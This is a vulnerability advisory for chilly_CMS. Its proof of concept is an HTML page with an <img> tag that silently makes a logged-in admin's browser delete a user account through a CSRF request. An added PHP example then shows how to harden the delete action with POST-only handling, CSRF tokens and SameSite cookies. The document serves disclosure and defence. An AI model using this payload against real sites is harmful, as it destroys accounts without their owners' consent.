=======================================================================
chilly_CMS CSRF Vulnerability
=======================================================================

# Vulnerability found in: Admin module
# Email: Pratulag@yahoo.com
# Company: aksitservices
# Credit by: Pratul Agrawal
# Software: chilly_CMS
# Category: CMS / Portals
# Platform: php
# Greetz to Gaurav, Prateek, Vivek, Sanjay, Sourabh, Varun (My Web Team)

# Proof of concept #
Script to delete the admin user through cross-site request forgery:
..................................................................................................................
<html>
<body>
<img src="http://server/chillycms/admin/usersgroups.site.php?action=deleteuser&id=[user ID]" />
</body>
</html>
..................................................................................................................
After execution, refresh the page and you can see that the added content has been deleted automatically.

# If you have any questions, comments, or concerns, feel free to contact me.
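
Added example (not part of the original advisory and not chilly_CMS code): one way an admin "deleteuser" action can be hardened so that a cross-site GET such as the <img> request above is refused. The delete_user() helper, the is_admin and csrf_token session keys, and the csrf_token form field are assumptions made for illustration.

```php
<?php
// Added example: hypothetical hardened handler for a "delete user" admin action.
// delete_user() and the session/form key names are assumptions, not chilly_CMS code.
declare(strict_types=1);

// Defense in depth: SameSite keeps the session cookie off most cross-site subrequests.
session_set_cookie_params(['samesite' => 'Lax', 'httponly' => true]);
session_start();

function csrf_token(): string
{
    // One random token per session, emitted as a hidden field in every admin form.
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

function reject(int $status, string $reason): void
{
    http_response_code($status);
    exit($reason);
}

function delete_user(int $id): void
{
    // Placeholder for the application's own deletion routine (assumption).
}

if (($_GET['action'] ?? '') === 'deleteuser') {
    if (empty($_SESSION['is_admin'])) {
        reject(403, 'Admin login required');
    }
    // 1. State-changing actions are POST only, so an <img> or link cannot trigger them.
    if ($_SERVER['REQUEST_METHOD'] !== 'POST') {
        header('Allow: POST');
        reject(405, 'POST required');
    }
    // 2. The request must carry the session's token, which a third-party page cannot read.
    $sent = $_POST['csrf_token'] ?? '';
    if (!is_string($sent) || !hash_equals(csrf_token(), $sent)) {
        reject(403, 'Invalid CSRF token');
    }
    // 3. Accept only a positive integer user id.
    $id = filter_input(INPUT_POST, 'id', FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === null || $id === false) {
        reject(400, 'Invalid user id');
    }
    delete_user($id);
}
```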